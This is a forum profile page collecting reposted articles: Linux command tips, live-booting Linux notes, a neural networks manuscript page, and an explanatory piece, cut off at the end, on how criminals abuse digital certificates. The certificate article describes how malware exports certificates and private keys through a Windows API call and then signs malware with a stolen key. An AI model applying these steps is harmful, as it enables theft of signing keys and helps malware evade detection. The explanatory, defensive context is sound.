-
Posts
18725 -
Joined
-
Last visited
-
Days Won
706
Everything posted by Nytro
-
E posibil sa fie o "bula" de aer. Dar daca display-ul merge ok, nu vad care e problema. Daca l-ai cumparat deja, il poti incalzi putin cu un feon, apoi sa tii apasat si sa speri sa dispara. Si, de preferat, sa aplici presiune dispre interior spre margine, ca in cazul in care e aer acolo, sa poata iesi.
-
Poza e facuta cu 3310? Nu se vede. Da folia jos mai intai. Apoi baga USOR ceva acolo si vezi daca se misca.
-
51 Useful Lesser Known Commands for Linux Users By Avishek Kumar Under: Linux Commands On: December 24, 2013 Download Your Free eBooks NOW - 10 Free Linux eBooks for Administrators Linux command line is attractive and fascinating, and there exists a flock of Linux user who are addictive to command Line. Linux command line can be funny and amusing, if you don’t believe me, you can check one of our article below. 20 Funny Commands of Linux or Linux is Fun in Terminal 51 Lesser Known Commands for Linux As well as extremely powerful, at the same time. We brought to you, five articles on “Lesser Known Linux Commands” consisting of 50+ lesser known Linux command. This article aims at concatenating all those five articles as one, and lets you know, what is where, in brief. 11 Lesser Known Commands – Part I This article was highly appreciated by our readers, which contains simple yet very important commands. The article summaries as. 1. sudo!! : Forgot to run a command with sudo? You need not re-write the whole command, just type “sudo!!” and the last command will run with sudo. 2. Python -m SimpleHTTPServer : Creates a simple web page for the current working directory over port 8000. 3. mtr : A command which is a combination of ‘ping’ and ‘traceroute’ command. 4. Ctrl+x+e : This key combination fires up, an editor in the terminal, instantaneously. 5. nl : Outputs the content of text file with lines Numbered. 6. shuf : Randomly selects line/file/folder from a file/folder. 7. ss : Outputs Socket Statistics. 8. Last: Want to know history of last logged in users? This command comes to rescue here. 9. curl ifconfig.me : Shows machine’s external IP Address. 10. tree : Prints files and folders in tree like fashion, recursively. 11. Pstree : Prints running processes with child processes, recursively. 11 Lesser Known Useful Linux Commands – Part I The great response, received on this article, and requests to provide another list of ‘Lesser Known Linux Commands‘, from our readers, we wrote next article of the series is: 10 Lesser Known Commands – Part II This article again was warm welcomed. The summary of the article, below is enough to describe this. 12. <space> command : A space before a bash command, is not recorded in history. 13. stat : Shows the status information of a file as well as of a file system. 14. <alt>. And <esc>. : A tweak which put the last command argument at prompt, in the order of last entered command, appearing first. 15. Pv : outputs simulating text, similar to hollywood movies. 16. Mount | column -t : Lists mounted file system, in nice formatting with specification. 17. Ctrl + l: clear shell prompt, instantaneously. 18. curl -u gmail_id –silent “https://mail.google.com/mail/feed/atom” | perl -ne ‘print “\t” if //; print “$2\n” if /(.*)/;’. This simple scripts, opens up, unread mail of an user, in the terminal itself. 19. screen : Detach and Reattach, long running process from a session. 20. file : Outputs information, regarding types of file. 21. id : Print User and Group Id. 10 Lesser Known Linux Commands – Part 2 Getting over 600 Likes on different social Networking sites and many thankful comments, we were ready with our third article of the series is: 10 Lesser Known Commands – Part 3 This article summaries as below: 22. ^foo^bar : Run last command with modification, without the need of rewriting the whole command again. 23. > file.txt : Flush the content of a text file, in a single go, from the command prompt. 24. at : Run a particular command, time based. 25. du -h –max-depth=1 Command : Outputs the size of all the files and folders within current folder, in human readable format. 26. expr : Solve simple mathematical calculations from the terminal. 27. look: Check for an English word, from the dictionary, in case of confusion, right from the shell. 28. yes : continues to print a sting, till interrupt instruction is given. 29. factor: Gives all the possible factors of a decimal number. 30. ping -i 60 -a IP_address : Pings the provided IP_address, and gives audible sound when host comes alive. 31. tac : Prints content of a file, in reverse order. 10 Lesser Known Commands for Linux – Part 3 Our Hard-work was paid by the response we received and fourth article of the series was: 10 Lesser Known Linux Commands – Part IV Need not say, again this article was appreciated. The article summarises below: 32. strace : A debugging tool. 33. disown -a && exit Command : Run a command in background, even after terminal session is closed. 34. getconf LONG_BIT Command : Output Machine Architecture, very clearly. 35. while sleep 1;do tput sc;tput cup 0 $(($(tput cols)-29));date;tput rc;done & : The script outputs date and time on the top right corner of shell/ terminal. 36. convert : converts the output of a command in picture, automatically. 37. watch -t -n1 “date +%T|figlet” : Show animated digital clock at the prompt. 38. host and dig : DNS lookup utility. 39. dstat : Generates statistics regarding system resource. 40. bind -p : Shows all the shortcuts available in Bash. 41. Touch /forcefsck : Force file-system check on next boot. 10 Lesser Known Effective Linux Commands – Part IV 10 Lesser Known Linux Commands- Part V The commands from here was getting biased towards scripts, yes single line powerful shell scripts and we thought to provide at least one more article on this series. 42. lsb_release : Prints distribution specification information. 43. nc -ZV localhost port_number : Check if a specific port is open or not. 44. curl ipinfo.io : Outputs Geographical Information, regarding an ip_address. 45. find .-user xyz : Lists all file owned by user ‘xyz’ 46. apt-get build-dep package_name: Build all the dependency, automatically while installing any specific package. 47. lsof -iTCP:80 -sTCP:LISTEN. The script, outputs all the service/process using port 80. 48. find -size +100M : This command combination, Lists all the files/folders the size of which is 100M or more. 49. pdftk : A nice way to concatenate a lot of pdf files, into one. 50. ps -LF -u user_name : Outputs Processes and Threads of a user. 51. Startx — :1 (This command creates another new X session). 10 Lesser Known Useful Linux Commands- Part V That’s all for now. Don’t forget to give us your valuable feedback in our comment section. This is not an end of lesser known Linux commands, and we will keep them bringing to you, from time to time, in our articles. I’ll be coming with another article, very interesting and useful for our readers. Till then stay tuned and connected to Tecmint.com. Sursa: 51 Useful Lesser Known Commands for Linux Users
-
Adventures in live booting Linux distributions July 29, 2014 By Major Hayden We’re all familiar with live booting Linux distributions. Almost every Linux distribution under the sun has a method for making live CD’s, writing live USB sticks, or booting live images over the network. The primary use case for some distributions is on a live medium (like KNOPPIX). However, I embarked on an adventure to look at live booting Linux for a different use case. Sure, many live environments are used for demonstrations or installations — temporary activities for a desktop or a laptop. My goal was to find a way to boot a large fleet of servers with live images. These would need to be long-running, stable, feature-rich, and highly configurable live environments. Finding off the shelf solutions wasn’t easy. Finding cross-platform off the shelf solutions for live booting servers was even harder. I worked on a solution with a coworker to create a cross-platform live image builder that we hope to open source soon. (I’d do it sooner but the code is horrific.) Debian jessie (testing) First off, we took a look at Debian’s Live Systems project. It consists of two main parts: something to build live environments, and something to help live environments boot well off the network. At the time of this writing, the live build process leaves a lot to be desired. There’s a peculiar tree of directories that are required to get started and the documentation isn’t terribly straightforward. Although there’s a bunch of documentation available, it’s difficult to follow and it seems to skip some critical details. (In all fairness, I’m an experienced Debian user but I haven’t gotten into the innards of Debian package/system development yet. My shortcomings there could be the cause of my problems.) The second half of the Live Systems project consist of multiple packages that help with the initial boot and configuration of a live instance. These tools work extremely well. Version 4 (currently in alpha) has tools for doing all kinds of system preparation very early in the boot process and it’s compatible with SysVinit or systemd. The live images boot up with a simple SquashFS (mounted read only) and they use AUFS to add on a writeable filesystem that stays in RAM. Reads and writes to the RAM-backed filesystem are extremely quick and you don’t run into a brick wall when the filesystem fills up (more on that later with Fedora). Ubuntu 14.04 Ubuntu uses casper which seems to precede Debian’s Live Systems project or it could be a fork (please correct me if I’m incorrect). Either way, it seemed a bit less mature than Debian’s project and left a lot to be desired. Fedora and CentOS Fedora 20 and CentOS 7 are very close in software versions and they use the same mechanisms to boot live images. They use dracut to create the initramfs and there are a set of dmsquash modules that handle the setup of the live image. The livenet module allows the live images to be pulled over the network during the early part of the boot process. Building the live images is a little tricky. You’ll find good documentation and tools for standard live bootable CD’s and USB sticks, but booting a server isn’t as straightforward. Dracut expects to find a squashfs which contains a filesystem image. When the live image boots, that filesystem image is connected to a loopback device and mounted read-only. A snapshot is made via device mapper that gives you a small overlay for adding data to the live image. This overlay comes with some caveats. Keeping tabs on how quickly the overlay is filling up can be tricky. Using tools like df is insufficient since device mapper snapshots are concerned with blocks. As you write 4k blocks in the overlay, you’ll begin to fill the snapshot, just as you would with an LVM snapshot. When the snapshot fills up and there are no blocks left, the filesystem in RAM becomes corrupt and unusable. There are some tricks to force it back online but I didn’t have much luck when I tried to recover. The only solution I could find was to hard reboot. Arch The ArchLinux live boot environments seem very similar to the ones I saw in Fedora and CentOS. All of them use dracut and systemd, so this makes sense. Arch once used a project called Larch to create live environments but it’s fallen out of support due to AUFS2 being removed (according to the wiki page). Although I didn’t build a live environment with Arch, I booted one of their live ISO’s and found their live environment to be much like Fedora and CentOS. There was a device mapper snapshot available as an overlay and once it’s full, you’re in trouble. OpenSUSE The path to live booting an OpenSUSE image seems quite different. The live squashfs is mounted read only onto /read-only. An ext3 filesystem is created in RAM and is mounted on /read-write. From there, overlayfs is used to lay the writeable filesystem on top of the read-only squashfs. You can still fill up the overlay filesystem and cause some temporary problems, but you can back out those errant files and still have a useable live environment. Here’s the problem: overlayfs was given the green light for consideration in the Linux kernel by Linus in 2013. It’s been proposed for several kernel releases and it didn’t make it into 3.16 (which will be released soon). OpenSUSE has wedged overlayfs into their kernel tree just as Debian and Ubuntu have wedged AUFS into theirs. Wrap-up Building highly customized live images isn’t easy and running them in production makes it more challenging. Once the upstream kernel has a stable, solid, stackable filesystem, it should be much easier to operate a live environment for extended periods. There has been a parade of stackable filesystems over the years (remember funion-fs?) but I’ve been told that overlayfs seems to be a solid contender. I’ll keep an eye out for those kernel patches to land upstream but I’m not going to hold my breath quite yet. Sursa: Adventures in live booting Linux distributions | major.io
-
[h=1]A Brief Introduction to Neural Networks[/h] [h=2]Manuscript Download - Zeta2 Version[/h] Filenames are subject to change. Thus, if you place links, please do so with this subpage as target. If you like the manuscript and want to buy me a coffee or beer, please click on the Flattr button on the right Thanks! [TABLE=class: inline] [TR=class: row0] [TH=class: col0 leftalign] [/TH] [TH=class: col1 centeralign] Original version [/TH] [TH=class: col2 centeralign] eBookReader optimized [/TH] [/TR] [TR=class: row1] [TH=class: col0] English [/TH] [TD=class: col1 centeralign] PDF, 6.2MB, 244 pages [/TD] [TD=class: col2 centeralign] PDF, 6.1MB, 286 pages [/TD] [/TR] [TR=class: row2] [TH=class: col0] German [/TH] [TD=class: col1 centeralign] PDF, 6.2MB, 256 pages [/TD] [TD=class: col2 centeralign] PDF, 6.2MB, 296 pages [/TD] [/TR] [/TABLE] [h=3]Original Version? EBookReader Version?[/h] The original version is the two-column layouted one you've been used to. The eBookReader optimized version on the other hand has one-column layout. In addition, headers, footers and marginal notes were removed. For print, the eBookReader version obviously is less attractive. It lacks nice layout and reading features and occupies a lot more pages. However, using electronic readers, the simpler lay-out significantly reduces the scrolling effort. During every release process from now on, the eBookReader version going to be automatically generated from the original content. However, contrary to the original version, it is not provided an additional manual layout and typography tuning cycle by the release workflow. So concerning the aestetics of the eBookReader optimized version, do not expect any support [h=2]Further Information for Readers[/h] [h=3]Provide Feedback![/h] This manuscript relies very much on your feedback to improve it. As you can see from the lots of helpers mentioned in my frontmatter, I really appreciate and make use of feedback I receive from readers. If you have any complaints, bug-fixes, suggestions, or acclamations send emails to me or place a comment in the newly-added discussion section below at the bottom of this page. Be sure you get a response. [h=3]How to Cite this Manuscript[/h] There's no official publisher, so you need to be careful with your citation. For now, use this: David Kriesel, 2007, A Brief Introduction to Neural Networks, available at Informatik, Realsatire, Photos. Und Ameisen in einem Terrarium. · D. Kriesel This reference is, of course, for the english version. Please look at the German translation of this page to find the German reference. Please always include the URL – it's the only unique identifier to the text (for now)! Note the lack of edition name, which changes with every new edition, and Google Scholar and Citeseer both have trouble with fast-changing editions. If you prefer BibTeX: @book{ Kriesel2007NeuralNetworks, author = { David Kriesel }, title = { A Brief Introduction to Neural Networks }, year = { 2007 }, note = { available at Informatik, Realsatire, Photos. Und Ameisen in einem Terrarium. · D. Kriesel } } Again, this reference is for the English version. [h=3]Terms of Use[/h] From the epsilon edition, the text is licensed under the Creative Commons Attribution-No Derivative Works 3.0 Unported License, except for some little portions of the work licensed under more liberal licenses as mentioned in the frontmatter or throughout the text. Note that this license does not extend to the source files used to produce the document. Those are still mine. [h=2]Roadmap[/h] To round off the manuscript, there is still some work to do. In general, I want to add the following aspects: Implementation and SNIPE: While I was editing the manuscript, I was also implementing SNIPE a high performance framework for using neural networks with JAVA. This has to be brought in-line with the manuscript: I'd like to place remarks (e.g. “This feature is implemented in method XXX in SNIPE”) all over the manuscript. Moreover, an extensive discussion chapter on the efficient implementation of neural networks will be added. Thus, SNIPE can serve as reference implementation for the manuscript, and vice versa. Evolving neural networks: I want to add a nice chapter on evolving neural networks (which is, for example, one of the focuses of SNIPE, too). Evolving means, just growing populations of neural networks in an evolutionary-inspired way, including topology and synaptic weights, which also works with recurrent neural networks. Hints for practice: In chapters 4 and 5, I'm still missing lots of practice hints (e.g. how to preprocess learning data, and other hints particularly concerning MLPs). Smaller issues: A short section about resilient propagation and some more algorithms would be great in chapter 5. The chapter about recurrent neural networks could be extended. Some references are still missing. A small chapter about echo state networks would be nice. I think, this is it … as you can see, there's still a bit of work to do until I call the manuscript “finished”. All in all, It will be less work than I already did. However, it will take several further releases until everything is included. [h=3]Recent News[/h] As of the manuscript's Epsilon version, update information is published in news articles whose headlines you find right below. Please click on any news title to get the information. 2012-03-17: EbookReader Versions of Neural Networks Manuscript 2011-10-21: New Release "A Brief Introduction to Neural Networks": Zeta version 2010-11-20: "A brief Introduction to Neural Networks": English version gets overwrought thoroughly! 2010-10-13: "A Brief Introduction to Neural Networks" published in Epsilon2 Version 2009-10-11: "A Brief Introduction to Neural Networks" published in Epsilon Version [h=2]What are Neural Networks, and what are the Manuscript Contents?[/h] Neural networks are a bio-inspired mechanism of data processing, that enables computers to learn technically similar to a brain and even generalize once solutions to enough problem instances are tought. The manuscript “A Brief Introduction to Neural Networks” is divided into several parts, that are again split to chapters. The contents of each chapter are summed up in the following. [h=3]Part I: From Biology to Formalization -- Motivation, Philosophy, History and Realization of Neural Models[/h] [h=4]Introduction, Motivation and History[/h] How to teach a computer? You can either write a rigid program – or you can enable the computer to learn on its own. Living beings don't have any programmer writing a program for developing their skills, which only has to be executed. They learn by themselves – without the initial experience of external knowledge – and thus can solve problems better than any computer today. KaWhat qualities are needed to achieve such a behavior for devices like computers? Can such cognition be adapted from biology? History, development, decline and resurgence of a wide approach to solve problems. [h=4]Biologische Neuronale Netze[/h] How do biological systems solve problems? How is a system of neurons working? How can we understand its functionality? What are different quantities of neurons able to do? Where in the nervous system are information processed? A short biological overview of the complexity of simple elements of neural information processing followed by some thoughts about their simplification in order to technically adapt them. [h=4]Components of Artificial Neural Networks[/h] Formal definitions and colloquial explanations of the components that realize the technical adaptations of biological neural networks. Initial descriptions of how to combine these components to a neural network. [h=4]How to Train a Neural Network?[/h] Approaches and thoughts of how to teach machines. Should neural networks be corrected? Should they only be encouraged? Or should they even learn without any help? Thoughts about what we want to change during the learning procedure and how we will change it, about the measurement of errors and when we have learned enough. [h=3]Part II: Supervised learning Network Paradigms[/h] [h=4]The Perceptron[/h] A classic among the neural networks. If we talk about a neural network, then in the majority of cases we speak about a percepton or a variation of it. Perceptrons are multi-layer networks without recurrence and with fixed input and output layers. Description of a perceptron, its limits and extensions that should avoid the limitations. Derivation of learning procedures and discussion about their problems. [h=4]Radial Basis Functions[/h] RBF networks approximate functions by stretching and compressing Gaussians and then summing them spatially shifted. Description of their functions and their learning process. Comparison with multi-layer perceptrons. [h=4]Recurrent Multi-layer Perceptrons[/h] Some thoughts about networks with internal states. Learning approaches using such networks, overview of their dynamics. [h=4]Hopfield Networks[/h] In a magnetic field, each particle applies a force to any other particle so that all particles adjust their movements in the energetically most favorable way. This natural mechanism is copied to adjust noisy inputs in order to match their real models. [h=4]Learning Vector Quantisation[/h] Learning vector quantization is a learning procedure with the aim to reproduce the vector training sets divided in predefined classes as good as possible by using a few representative vectors. If this has been managed, vectors which were unkown until then could easily be assigned to one of these classes. [h=3]Part III: Unsupervised learning Network Paradigms[/h] [h=4]Self Organizing Feature Maps[/h] A paradigm of unsupervised learning neural networks, which maps an input space by its fixed topology and thus independently looks for simililarities. Function, learning procedure, variations and neural gas. [h=4]Adaptive Resonance Theory[/h] An ART network in its original form shall classify binary input vectors, i.e. to assign them to a 1-out-of-n output. Simultaneously, the so far unclassified patterns shall be recognized and assigned to a new class. [h=3]Part IV: Excursi, Appendices and Registers[/h] [h=4]Cluster Analysis and Regional and Online Learnable Fields[/h] In Grimm's dictionary the extinct German word “Kluster” is described by “was dicht und dick zusammensitzet (a thick and dense group of sth.)”. In static cluster analysis, the formation of groups within point clouds is explored. Introduction of some procedures, comparison of their advantages and disadvantages. Discussion of an adaptive clustering method based on neural networks. A regional and online learnable field models from a point cloud, possibly with a lot of points, a comparatively small set of neurons being representative for the point cloud. [h=4]Neural Networks Used for Prediction[/h] Discussion of an application of neural networks: A look ahead into the future of time series. [h=4]Reinforcement Learning[/h] What if there were no training examples but it would nevertheless be possible to evaluate how good we have learned to solve a problem? et us regard a learning paradigm that is situated between supervised and unsupervised learning. Posted on 2009-05-01 by David Kriesel. Sursa: A Brief Introduction to Neural Networks · D. Kriesel
-
How Cybercrime Exploits Digital Certificates What is a digital certificate? The digital certificate is a critical component of a public key infrastructure. It is an electronic document that associates the individual identity of a person to the public key associated with it. A certificate can then be associated with a natural person, a private company or a web service as a portal. The certificate is issued by an organization, dubbed Certification Authority (or CA), recognized as “trusted” by the parties involved, and is used ordinarily for the operations of public key cryptography. The Certification Authority issues a digital certificate in response to a request only after it verifies the identity of the certificate applicant. The process of telematics verification of certificates can be done by anyone since the CA maintains a public register of digital certificates issued and a register related to revoke the ones (Certification Revocation List or CRL). Each digital certificate is associated with a time period of validity, so certificates may be revoked if expired. Other conditions that could cause the revocation of a digital certificate are the exposure of its private key, and any change of the relationship between the subject and its public key, for example the change of the mail address of the applicant. In the process of asymmetric cryptography, each subject is associated with a pair of keys, one public and one private. Any person may sign a document with its private key. Everyone with intent to verify the authenticity of the document can verify the document using the public key of the signer, which is exposed by the CA. Another interesting use linked to the availability of the public key of an entity is the sending of encrypted documents. Assuming you want to send an encrypted document to Pierluigi, it is sufficient that you sign them with his public key exposed by the CA. At this point, only Pierluigi with his private key, associated with the public key used for the encryption, can decrypt the document. The public key of each subject is contained in a digital certificate signed by a trusted third party. In this way, those who recognize the third party as trustworthy just have to verify its signature to accept as valid the public key it exposes. The most popular standard for digital certificates is the ITU-T X.509, according to which a CA issues a digital certificate that binds the public key of the subject to a Name Badge (Distinguished Name), or to an Alternative Name (Alternative Name) such as an email address or a DNS record. The structure of an X.509 digital certificate includes the following information: version serial number ID algorithm body emitter validity subject information on the public key of the subject signature algorithm of the certificate signature of certificate It is likely you’ll come across the extensions used for files containing X.509 certificates, the most common are: CER – Certified with DER encoded, sometimes sequences of certificates. DER – DER encoded certificate. PEM – Base64-encoded certificate to a file. PEM may contain certificates or private keys. P12 – PKCS # 12 certificates and may contain public and private keys (password protected). Another classification of digital certificates is the intended use. It is useful to distinguish authentication certificates and subscription certificates. A subscription Digital Certificate is used to define the correspondence between an individual applying for the certificate and its public key. These certificates are the ones used for the affixing of digital signatures that are legally valid. A Certificate of Authentication is mainly used for accessing web sites that implement authentication via certificate, or sign up for e-mail messages in order to ensure the identity of the sender. An authentication certificate is usually associated with an email address in a unique way. A digital certificate in the wrong hands Security experts recognize 2011 as the worst year for certification authorities. The number of successful attacks against major companies reported during the year has no precedent, many of them had serious consequences. Comodo was the first organization to suffer a cyber attack. High managers at Comodo revealed that the registration authority had been compromised in a March 15th, 2011 attack and that the username and password of a Comodo Trusted Partner in Southern Europe were stolen. As consequence, a Registration Autorithy suffered an attack that resulted in a breach of one user account of that specific RA. Its account was then fraudulently used to issue nine digital certificates across seven different domains, including: login.yahoo.com (NSDQ:YHOO), mail. google.com (NSDQ:GOOG), login.skype.com, and addons.mozilla.org. All of these certificates were revoked immediately upon discovery. In August of the same year, another giant fell victim to a cyber attack: the Dutch Certification Authority DigiNotar, owned by VASCO Data Security International. On September 3rd, 2011, after it had become clear that a security breach had resulted in the fraudulent issuing of certificates, the Dutch government took over the operational management of DigiNotar’s systems. A few weeks later, the company was declared bankrupt. But the list of victims is long. KPN stopped issuing digital certificates after finding a collection of attack tools on its server likely used to compromise it. The company informed the media that there wasn’t evidence that its CA infrastructure was compromised, and that all the actions to respond the incident had been started as a precaution. Experts at KPN discovered the tools during a security audit: they found a server hosting a DDoS tool. The application may have been there for as long as four years. Unfortunately, the defeat is not finished, because in the same period, GemNET, a subsidiary of KPN (a leading telecommunications and ICT service provider in The Netherlands), suffered a data breach, and according to Webwereld, the hack was related to CA certificates. The list of victims is reported in the following table published by the expert Paolo Passeri on his blog hackmageddon.com. It includes also other giants like GlobalSign and DigiCert Malaysia. Figure – CA incidents occurred in 2011 (Hackmageddon.com) Why attack a Certification Authority? Cybercriminals and state-sponsored hackers are showing a great interest in the PKI environment, and in particular they are interested in abusing digital certificates to conduct illicit activities like cyber espionage, sabotage or malware diffusion. The principal malicious uses related to the digital certificates are: Improve malware diffusion Installation of certain types of software (e.g. application updates) its code to be digitally signed with a trusted certificate. For this reason, cyber criminals and other bad actors have started to target entities managing digital certificates. By stealing a digital certificate associated with a trusted vendor and signing malicious code with it, it reduces the possibility that a malware will be detected as quickly. Security experts have estimated that more than 200,000 unique malware binaries were discovered in the last couple of years signed with valid digital signatures. The most famous example is represented by the cyber weapon Stuxnet used to infect nuclear plants for the enrichment of uranium in Iran. The source code of the malware was signed using digital certificates associated to Realtek Semiconductor and JMicron Technology Corp, giving the appearance of legitimate software to the targeted systems. Stuxnet drivers were signed with certificates from JMicron Technology Corp and Realtek Semiconductor Corp, two companies that have offices in the Hsinchu Science and Industrial Park. Security experts at Kaspersky Lab hypothesized an insider job. It is also possible that the certificates were stolen using a dedicated Trojan such as Zeus, meaning there could be more. Figure – Digital certificate used to sign Stuxnet In September 2013, cyber criminals stole digital certificates associated with Adobe. According to security chief Brad Arkin, a group of hackers signed a malware using an Adobe digital certificate, compromising a vulnerable build server of the company. The hacked server was used to get code validation from the company’s code-signing system. “We have identified a compromised build server with access to the Adobe code signing infrastructure. We are proceeding with plans to revoke the certificate and publish updates for existing Adobe software signed using the impacted certificate … This only affects the Adobe software signed with the impacted certificate that runs on the Windows platform and three Adobe AIR applications* that run on both Windows and Macintosh. The revocation does not impact any other Adobe software for Macintosh or other platforms … Our forensic investigation is ongoing. To date we have identified malware on the build server and the likely mechanism used to first gain access to the build server. We also have forensic evidence linking the build server to the signing of the malicious utilities. We can confirm that the private key required for generating valid digital signatures was not extracted from the HSM,” reported the company advisory (written by Arkin). Figure – Adobe Breach Advisory The hackers signed with a valid and legitimate Adobe certificate at least a couple of malicious codes, a password dumper, and a malicious ISAPI filter. The two malicious programs were signed on July 26, 2012. In April 2014, security researchers at Comodo AV Labs detected a new variant of the popular Zeus Trojan, enhanced with a digital signature of its source code to avoid detection. This instance is digitally signed with a stolen digital certificate, which belongs to Microsoft Developer. Figure – Adobe Digital Certificate abused by cyber criminals Economic Frauds A digital signature gives a warranty on who signed a document and you can decide if you trust the person or company who signed the file and the organization who issued the certificate. If a digital certificate is stolen, victims will suffer an identity theft and related implications. Malware authors could design a specific malicious agent that could be spread to steal digital certificates. In the case of certificates associated with a web browser, it is possible to trick victims into thinking that a phishing site is legitimate. Cyber warfare Cyber espionage conducted by cyber criminals or state sponsored hackers are the activities most frequently carried out with stolen certificates. Digital certificates are used by attackers to conduct “man-in-the-middle” attacks over the secure connections, tricking users into thinking they were on a legitimate site when in fact their SSL/TLS traffic was being secretly tampered with and intercepted. One of the most blatant case was the DigiNotar one, when different companies like Facebook, Twitter, Skype, Google and also intelligence agencies like CIA, Mossad, and MI6 were targeted in the Dutch government certificate hack. In 2011, Fox-IT security firm discovered that the extent and duration of the breach were much more severe than had previously been disclosed. The attackers could have used the stolen certificates to spy on users of popular websites for weeks, without their being able to detect it. “It’s at least as bad as many of us thought … DigiNotar appears to have been totally owned for over a month without taking action, and they waited another month to take necessary steps to notify the public,” said Chester Wisniewski, a senior security advisor at Sophos Canada, in a blog post. Fox-IT was commissioned by Diginotar to conduct an audit, dubbed “Operation Black Tulip,” and discovered that the servers of the company were compromised. Another clamorous case was discovered in December 2013 by Google, which notices the use of digital certificates issued by an intermediate certificate authority linked to ANSSI for several Google domains. ANSSI is the French Cyber Security agency that operates with French intelligence agencies. The organization declares that an intermediate CA is generating fake certificates to conduct MITM attacks and inspect SSL traffic. Be aware that an intermediate CA certificate carries the full authority of the CA, and attackers can use it to create a certificate for any website they wish to hack. “ANSSI has found that the intermediate CA certificate was used in a commercial device, on a private network, to inspect encrypted traffic with the knowledge of the users on that network.” Google discovered the ongoing MITM attack and blocked it. Google also declared that ANSSI has requested to block an intermediate CA certificate. Figure – Digital certificate warning “As a result of a human error which was made during a process aimed at strengthening the overall IT security of the French Ministry of Finance, digital certificates related to third-party domains which do not belong to the French administration have been signed by a certification authority of the DGTrésor (Treasury) which is attached to the IGC/A. “The mistake has had no consequences on the overall network security, either for the French administration or the general public. The aforementioned branch of the IGC/A has been revoked preventively. The reinforcement of the whole IGC/A process is currently under supervision to make sure no incident of this kind will ever happen again,” stated the ANSSI advisory. The ANSSI attributed the incident to “Human Error” made by someone at the Finance Ministry, sustaining that the intermediate CA certificate was used in a commercial device, on a private network, to inspect encrypted traffic with the knowledge of the users on that network. Misusing Digital Certificates Digital certificates have been misused many times during recent years. Bad actors abused them to conduct cyber attacks against private entities, individuals and government organizations. The principal abuses of digital certificates observed by security experts: Man-in-the-middle (MITM) attacks Bad actors use digital certificates to eavesdrop on SSL/TLS traffic. Usually these attacks exploit the lack of strict controls by client applications when a server presents them with an SSL/TLS certificate signed by a trusted but unexpected Certification Authority. SSL certificates are the privileged mechanism for ensuring that secure web sites really are who they say they are. Typically, when we access a secure website, a padlock is displayed in the address bar. Before the icon appears, the site first presents a digital certificate, signed by a trusted “root” authority, that attests to its identity and encryption keys. Unfortunately web browsers, due to improper design and lack of efficient verification processes, accept the certificates issued by the trusted CA, even if it is an unexpected one. An attacker that is able to obtain a fake certificate from any certification authority and present it to the client during the connection phase can impersonate every encrypted web site the victim visits. “Most browsers will happily (and silently) accept new certificates from any valid authority, even for web sites for which certificates had already been obtained. An eavesdropper with fake certificates and access to a target’s internet connection can thus quietly interpose itself as a ‘man-in-the-middle’, observing and recording all encrypted web traffic traffic, with the user none the wiser.” Figure – MITM handshake Cyber attacks based on signed malware Another common cyber attack is based on malware signed with stolen code-signing certificates. The techniques allow attackers to improve avoidance techniques for their malicious codes. Once the private key associated with a trusted entity is compromised, it could be used to sign the malicious code of the malware. This trick allows an attacker to also install those software components (e.g. drivers, software updates) that require signed code for their installation/execution. One of the most popular cases was related to the data breach suffered by security firm Bit9. Attackers stole one of the company’s certs and used it to sign malware and serve it. The certificate was used to sign a malicious Java Applet that exploited a flaw in the browser of targeted browser. Malware installed illegitimate certificates Attackers could use also malware to install illegitimate certificates to trust them, avoiding security warnings. Malicious code could for example operate as a local proxy for SSL/TLS traffic, and the installed illegitimate digital certificates could allow attackers to eavesdrop on traffic without triggering any warning. The installation of a fake root CA certificate on the compromised system could allow attackers to arrange a phishing campaign. The bad actor just needs to set up a fake domain that uses SSL/TLS and passes certificate validation steps. Recently, Trend Micro has published a report on a hacking campaign dubbed “Operation Emmental”, which targeted Swiss bank accounts with a multi-faceted attack that is able to bypass two factor authentication implemented by the organization to secure its customers. The attackers, in order to improve the efficiency of their phishing schema, used a malware that installs a new root Secure Sockets Layer (SSL) certificate, which prevents the browser from warning victims when they land on these websites. Figure – Certificate installed by malware in MS store CAs issued improper certificates Improper certificates are issued by the CAs and hackers use them for cyber attacks. In one of the most blatant cases, DigiCert mistakenly sold a certificate to a non-existent company. the digital certificate was then used to sign malware used in cyber attacks. How to steal a digital certificate Malware is the privileged instrument for stealing a digital certificate and the private key associated with the victims. Experts at Symantec tracked different strains of malware which have the capability to steal both private keys and digital certificates from Windows certificate stores. This malicious code exploits the operating system’s functionality. Windows OS archives digital certificates in a certificate store. “Program code often uses the PFXExportCertStoreEx function to export certificate store information and save the information with a .pfx file extension (the actual file format it uses is PKCS#12).The PFXExportCertStoreEx function with the EXPORT_PRIVATE_KEYS option stores both digital certificates and the associated private keys, so the .pfx file is useful to the attacker,” states a blog post from Symantec. The CertOpenSystemStoreA function could be used to open certificates stored, meanwhile the PFXExportCertStoreEx function exports the content of the following certificate stores: MY: A certificate store that holds certificates with the associated private keys CA: Certificate authority certificates ROOT: Root certificates SPC: Software Publisher Certificates Invoking the PFXExportCertStoreEx function with the EXPORT_PRIVATE_KEYS option, it is possible to export both digital certificates and the associated private key. The code in the following image performs the following actions: Opens the MY certificate store Allocates 3C245h bytes of memory Calculates the actual data size Frees the allocated memory Allocates memory for the actual data size The PFXExportCertStoreEx function writes data to the CRYPT_DATA_BLOB area that pPFX points to Writes content of the certificate store. Figure – Malware code to access certificates info The experts noticed that a similar process is implemented by almost every malware used to steal digital certificates. Malicious code is used to steal certificate store information when the computer starts running. Once an an attacker has obtained the victim’s private key from a stolen certificate, it could use a tool like the Microsoft signing tool bundled with Windows DDK, Platform SDK, and Visual Studio. Running Sign Tool (signtool.exe), it is possible to digitally sign every code, including malware source code. Abuse prevention I desire to close this post introducing a couple of initiatives started to prevent the abuse of digital certificates. The first one is started by a security researcher at Abuse.ch, which has launched the SSL Black List, a project to create an archive of all the digital certificates used for illicit activities. Abuse.ch is a Swiss organization that was involved in the last years in many investigations on the principal major banker Trojan families and botnets. “The goal of SSLBL is to provide a list of bad SHA1 fingerprints of SSL certificates that are associated with malware and botnet activities. Currently, SSLBL provides an IP based and a SHA1 fingerprint based blacklist in CSV and Suricata rule format. SSLBL helps you in detecting potential botnet C&C traffic that relies on SSL, such as KINS (aka VMZeuS) and Shylock,” wrote the researcher in a blog post which introduces the initiative. The need to track abuse of certificates has emerged in recent years, after security experts discovered many cases in which bad actors abused digital certificates for illicit activities, ranging from malware distribution to Internet surveillance. Authors of malware are exploiting new methods to avoid detection by defense systems and security experts. For example, many attackers are using SSL to protect malicious traffic between C&C and infected machines. Each item in the list associates a certificate to the malicious operations in which attackers used it. The abuses include botnets, malware campaigns, and banking malware. The archive behind the SSL Black List, which actually includes 